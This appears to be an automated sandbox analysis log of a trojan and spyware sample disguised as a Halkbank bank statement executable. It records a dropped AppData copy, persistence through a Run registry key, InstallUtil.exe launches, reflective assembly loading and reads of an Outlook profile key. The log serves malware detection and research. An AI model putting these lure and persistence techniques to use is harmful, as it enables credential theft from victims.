                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeFile created: C:\Users\user\AppData\Roaming\ZsjnsslxjJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/4@7/4
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_01
                    Source: 15.0.InstallUtil.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 15.0.InstallUtil.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 15.0.InstallUtil.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 15.0.InstallUtil.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 15.0.InstallUtil.exe.400000.2.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 15.0.InstallUtil.exe.400000.2.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Ffnbziuo.exe.0.dr, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 17.0.Ffnbziuo.exe.10000.0.unpack, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 17.2.Ffnbziuo.exe.10000.0.unpack, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06459F88 push eax; retf
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_0645FB69 push eax; iretd
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_0645F338 pushfd ; retf
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_0645F1D8 pushad ; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331662 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633166A push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633165E push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316B2 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316B6 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316BA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316BE push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316A6 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316AA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316AE push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633169A push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633169E push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316F2 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316F6 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316FA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316FE push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316E2 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316E6 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316EA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316EE push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316D2 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316D6 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316DA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316DE push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316C2 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316C6 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316CA push es; ret
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: 0x90D0B804 [Fri Dec 28 08:15:00 2046 UTC]
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeFile created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FfnbziuoJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FfnbziuoJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
